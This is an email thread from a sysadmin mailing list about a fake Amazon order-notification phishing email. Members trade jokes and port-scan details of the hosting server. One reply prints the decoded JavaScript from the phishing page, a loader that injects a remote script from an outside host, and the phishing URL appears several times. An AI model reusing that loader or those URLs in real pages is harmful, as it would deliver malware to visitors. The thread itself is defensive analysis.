I was just alluding to the fact that my LinkedIn updates told me this morning that EZ had just done the CISSP exam.
I am sure a lot of people on this list, CISSPs or not, can identify the intentions and tactics of the spammers and phishers from their attacks :-) On 23 February 2010 17:17, Clark, Tommy R <[email protected]> wrote: > If he were fresh from a CISSP exam, he would have decoded the payload in > walford.html as the following JavaScript. > > > > function ljs(){try{var > s=document.createElement("script");s.setAttribute("src"," > http://saeghiebeesiogoh.in:3129/js > ");document.body.appendChild(s)}catch(e){}}setTimeout("ljs()",500); > > > > Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/js to > see what the true intentions were. > > > > *From:* [email protected] [mailto: > [email protected]] *On Behalf Of *James > Rankin > *Sent:* Tuesday, February 23, 2010 11:45 AM > > *To:* NT System Admin Issues > *Subject:* Re: Order Notify #401186 > > > > Now there's a guy who's obviously just fresh from a CISSP exam :-) > > On 23 February 2010 16:36, Ziots, Edward <[email protected]> wrote: > > http://80.109.240.71/~e.loesberg/walford.html<http://80.109.240.71/%7Ee.loesberg/walford.html> > > > > Is the link inside the email. It’s defintely a phishing attack. Single box > system behind a firewall (2 hops from source) > > > > Name: members.chello.nl > > Address: 80.109.240.71 > > (its in Vienna Austria) > > > > PORT STATE SERVICE REASON VERSION > > 21/tcp open ftp syn-ack ProFTPD 1.2.10 > > 80/tcp open http syn-ack Apache httpd > > > > Like they say, never click the link. And don’t answer the email, it lets > them know you are there.. and they will just keep spamming you… > > > > Z > > > > *From:* Sherry Abercrombie [mailto:[email protected]] > *Sent:* Tuesday, February 23, 2010 10:37 AM > > > *To:* NT System Admin Issues > > *Subject:* Re: Order Notify #401186 > > > > GMail is good. Marked this one as spam and sent to my spam folder, with a > nice little warning that it might not be from who it says and to be careful, > etc etc. > > On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <[email protected]> > wrote: > > Oooohhh....I must click on the link, seeing as though it has some funky > numbers instead of letters. Looks decidedly unsuspicious > > On 23 February 2010 15:29, Carol Fee <[email protected]> wrote: > > What the hec k ?????? > > > > *CFee* > > *From:* Customer Support [mailto:[email protected]] > *Sent:* Monday, February 22, 2010 6:55 PM > *To:* NT System Admin Issues > *Subject:* Order Notify #401186 > > > > > Your Order id:822324764225 > Info <http://80.109.240.71/%7Ee.loesberg/walford.html> > > Thank you. > Amazon.com Support > > > > > > > > > > > > > -- > "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into > the machine wrong figures, will the right answers come out?' I am not able > rightly to apprehend the kind of confusion of ideas that could provoke such > a question." > > > > > > > > > -- > Sherry Abercrombie > > "Any sufficiently advanced technology is indistinguishable from magic." > Arthur C. Clarke > > > > > > > > > > > > > -- > "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into > the machine wrong figures, will the right answers come out?' I am not able > rightly to apprehend the kind of confusion of ideas that could provoke such > a question." > > > > > > > > > > -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
